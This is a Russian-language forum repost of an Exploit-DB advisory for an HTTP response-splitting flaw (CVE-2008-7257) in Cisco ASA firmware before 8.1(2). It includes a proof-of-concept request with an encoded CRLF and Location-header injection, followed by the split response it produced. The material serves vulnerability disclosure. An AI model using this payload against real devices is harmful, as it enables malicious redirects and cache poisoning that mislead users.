Exploit Cisco Adaptive Security Response - HTTP Response Splitting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34200
Проверка EDB
  1. Пройдено
Автор
DANIEL KING
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
cve-2008-7257
Дата публикации
2010-06-25
Cisco Adaptive Security Response - HTTP Response Splitting
Код:
source: https://www.securityfocus.com/bid/41159/info

Cisco Adaptive Security Response (ASA) is prone to an HTTP response-splitting vulnerability.

Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into having a false sense of trust.

Firmware versions prior to Cisco ASA 8.1(2) are vulnerable.

This issue is being tracked by Cisco Bugid CSCsr09163.

URL: http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom Request: GET http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom HTTP/1.0 Host: /www.example.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Response: HTTP/1.0 301 Moved Permanently Server: Web Server Location: https:///www.example2.com/ Location: http:///www.example3.com Content-Type: text/html Content-Length: 125
 
Источник
www.exploit-db.com

Похожие темы